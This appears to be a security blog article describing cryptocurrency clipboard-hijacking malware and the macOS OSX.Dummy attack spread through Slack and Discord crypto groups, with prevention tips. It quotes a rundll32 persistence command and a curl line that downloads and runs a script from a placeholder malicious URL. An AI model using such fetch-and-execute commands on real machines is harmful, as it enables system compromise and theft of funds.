Unfortunately cyberattaks to the cryptographic space are occurring with great frequency. Maintaining a preventive attitude will always be the best measure we can adopt, however it is important to know about these recent attacks.
These days there is a new form of “cryptohacking” that consists of a software based on the Windows Clipboard that has affected millions of cryptocurrency users. It is literally the terror of the “copy” and “paste” functions of our operating systems.
An inescapable reality and which cybercriminals take advantage of is that cryptocurrency addresses are, by their extension, an absolute problem to be remembered easily. This problem is compounded if a person has multiple addresses in their wallet, not to mention if they have several different cryptocurrency wallets. Hence, it is an almost natural procedure for the user to use the “Ctrl C” and “Ctrl V” functions to copy and paste their cryptocurrency address into a wallet or exchange, or any other place where they are making a transaction with cryptocurrency.
This behavior is so recurrent and definitely inevitable that it has motivated a series of cybercriminals to create a malware that is plundering many users in the world. This new malware is known as “CryptoCurrency Clipboard Hijackers“, and basically consists in the malware monitoring the infected computer of a victim in the clipboard software and when cryptocurrency addresses are detected, the address of the victim changes to one that the attackers control.
The measures to be taken to prevent this type of attacks from fulfilling their purpose are fundamentally based on the prudence and care of the user, since he can double check, notice an error in the address and cancel the transaction, and thereby avoid losing his money.
By way of illustration, the malware runs a dynamic link library (DLL) operating system and downloads a d3dx11_31.dll file in the Windows Temp folder of the infected computer. Then when the user logs into his computer, a “rundll32 C: \ Users \ [username] \ AppData \ Local \ Temp \ d3dx11_31.dll, includes_func_runnded” command will be automatically executed. The rest is already a matter explained in the prudence of the user, but reviewing the aforementioned Windows folder will not hurt to eliminate the malicious file.
Other attacks are also happening on sites like Slack and Discord. Hackers have attacked user groups focused on the cryptocurrency theme of these sites, infiltrating computers with “cryptohacking” software.
This particular malware is known as OSX.Dummy, is based on MacOS, and allows the execution of arbitrary code in the machines in which it infiltrates. The modus operandi of infiltration is that the attackers pose as influential people in the crypto group of each site and send a link to the malware. Upon installation, the application downloads and executes the binary script “cd / tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && ./script”.
In this attack the victims belong to a forum related to cryptocurrencies, which gives attackers direct access to private addresses, emails, passwords and user security keys, violating everything.
The basic aspects of prevention must always be maintained, but keeping an updated antivirus, a brief review of the RAM in certain periods of time to verify anomalies and other necessary security measures can make a difference and keep computers safe.
